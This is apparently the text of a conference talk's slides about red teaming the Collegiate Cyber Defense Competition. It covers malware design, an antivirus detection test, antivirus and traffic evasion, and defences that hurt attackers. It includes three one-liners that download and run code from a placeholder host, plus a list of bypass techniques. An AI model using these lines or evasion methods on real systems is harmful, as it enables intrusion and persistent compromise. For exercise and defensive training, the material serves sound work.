Red teaming the CCDC

Red Teaming the CCDChacking the most paranoid student system administrators in the nation

Matt “scriptjunkie” Weeks

Some funny thingsOur mistakes and yours

No, don’t start “aCcbsXoAIfRsU”

Those other people logged-in are not

your friends.

You planned to get hacked?

This

VNC

A year of curating red team wallpaper

Gotta keep up with changing memes

The red team has you

Screenshot inception!

Personal Favorite

https://www.youtube.com/watch?v=TrnUO6TLrtE

The malware gamesChallenges writing malware

Requirements

Full-featured RAT

File access

Interactive shell

Screenshots, keylogger

May include stealth features

Basic backdoors

Used for re-establishing full-featured RAT

Simple command and/or shellcode execution

Callback or listening

Keylogger/persistent monitoring

File packing tools

Worms – every method possible

Compatibility is hard

Windows XP – Win 8.1

Hook-based keylogging fails…

*NIX’s

Make Windows look great

No two Linux distros startup the same

OS X(!)

NetBSD

OpenBSD

FreeBSD

X64/x86

OpenIndiana (Solaris)

Ubuntu

Fedora

Linux Mint

But hard work pays off, kids

On-the-fly backdoors

Usually you are caught off-guard with at least one system

Webshell collections are your friend

Scripting skills are a must

while[ true ] ; do wget -O - http://a.bc/def | sh ; sleep 10 ; done

eval(urllib2.urlopen('http://a.bc/def').read())

echo Set x=CreateObject("Microsoft.XMLHTTP"):x.Open

"GET","http://a.bc/def",False:x.Send:Execute x.responseText >>v.vbs&start v.vbs

First world red team problems:

I accidentally six or seven keylogger copies

On Antivirus

-or-

why does

everybody

use MBAM?

Process

Write malware

Does AV detect?

YesLook for

shady code

Obfuscate functions,

stringsDone!

No

But usually

Write malware

Does AV detect?

Done!

No

AV test lab

Top market share AV’s (Internet Security Suite version) on default settings

7 “fresh” tests (results BEFORE I knew what any of the AV’s would detect)

Why not VirusTotal?

Test 1: Widely known malware

with 1 byte appended

The only way to fail is by using giant hash lists instead of real signatures

FAIL

WIN

FAIL

WINFAIL

FAILFAILFAIL

WIN WIN WIN

WIN

Test 2: Malware with public code

samples

FAIL FAIL

FAIL

FAILFAILFAIL

FAIL FAIL FAIL FAIL FAIL

FAIL

Test 3: One-off malware with no

evasions

FAIL FAIL

FAIL

FAIL

FAIL FAIL INDECISIVE

FAIL

WINWIN

WININDECISIVE

Test 4: “Chris’s Ex-Girlfriend” – Highly

evasive malware workhorse

FAIL FAIL

FAIL

FAILFAILFAIL

FAIL FAIL FAIL FAIL FAIL

FAIL

Test 5: “The Kraken” – Sneaky firewall-

evading malware

FAIL FAIL

FAIL

FAILFAILFAIL

FAIL FAIL FAIL FAIL

FAIL

WIN

Test 6: Worm with no evasions

FAIL FAIL

FAIL FAIL FAIL

FAIL

WIN WINFAIL

Hosed VMFAILFAIL

Test 7: Legit program used maliciously

FAIL FAIL

FAIL

FAILFAIL

FAIL FAIL FAIL FAIL FAIL

FAILINDECISIVE

Notes

Symantec was only AV to detect reverse meterpreter on the wire

Kaspersky’s behavioral emulation detected one worm well

Kaspersky and Comodo both recognized at least one piece of malware as

unusual, (not on whitelist) but not necessarily bad

Trend Micro was only AV to block hash dumping

Panda, Avast gave errors installing and were not tested

Final standings

100% FAIL

meh

100% FAIL

TIED 1st100% FAIL

100% FAILFAILFAIL

meh TIED 1st 3rd

meh

Just kidding. After 2 hours obfuscating,

these are the real final standings:

FAIL FAIL

FAIL

FAILFAILFAIL

FAIL FAIL FAIL FAIL FAIL

FAIL

How do I bypass AV?

Write your own stuff

Dynamically resolve API calls

Obfuscate strings

Introduce environmental/system dependencies to generically thwart sandboxing

Write your own stuff

Impersonate legitimate software

Watch what hits disk

Digitally sign your stuff if you can

Write your own stuff

Security Software Lessons

Some AV’s are a total fail

MalwareBytes Pro is in this list with MS, McAfee, F-Secure

Many have one really cool feature or heuristic

Kaspersky, Symantec, Trend Micro

All can be bypassed easily for most malware

Only detection remaining after 2 hours was one worm vs Kaspersky

Hiding from the students

Hiding from the students

Host hiding

Hide while running

Hide start

Meterpreter is great for functionality, bad for persistence

Mostly custom malware

Mostly standard persistence methods

Don’t run in your own process

Don’t use any of those toy languages with dependencies

Use C!

Don’t hide stuff rootkit finders look for

Don’t sweat the one-offs

Hiding on the wires

Hiding from Wireshark

Harder than hiding on host

Try to blend in with normal traffic

Throw Wireshark crashers

Remove packets from view

Hiding from netstat/tcpview

Using HTTP(S) instead of TCP callbacks doesn’t leave connection open

If that fails, blend in by using common ports and cloud IP’s

Migrate session to web browser or critical process

Hiding on the wires

Use every protocol that gets out

TCP

UDP

HTTPS

DNS

Use hop points in cloud/web hosting

Use file sharing/paste/social media sites

Random callback selection and delays to avoid monitors

Any way students can send or receive info, you can too

Dealing with firewalls

Two types

Host

Network

Host firewalls

Usually don’t stop outbound traffic

Can go underneath, watch raw packets

Frequently add exceptions or drop the firewall

Network firewalls

Great to own

Tough if you don’t

Use service ports since

they must be able to

reach the hosts

Defenses that hurt

Patch or block RCE’s

Strict inbound and outbound network firewall rules

Traffic monitoring

Different passwords on all the boxes

Pull the plug

Reverting (sometimes)

Realizing that sometimes, the red team can’t hurt you as much as finishing

injects helps you

Questions

@scriptjunkie1

https://scriptjunkie.us/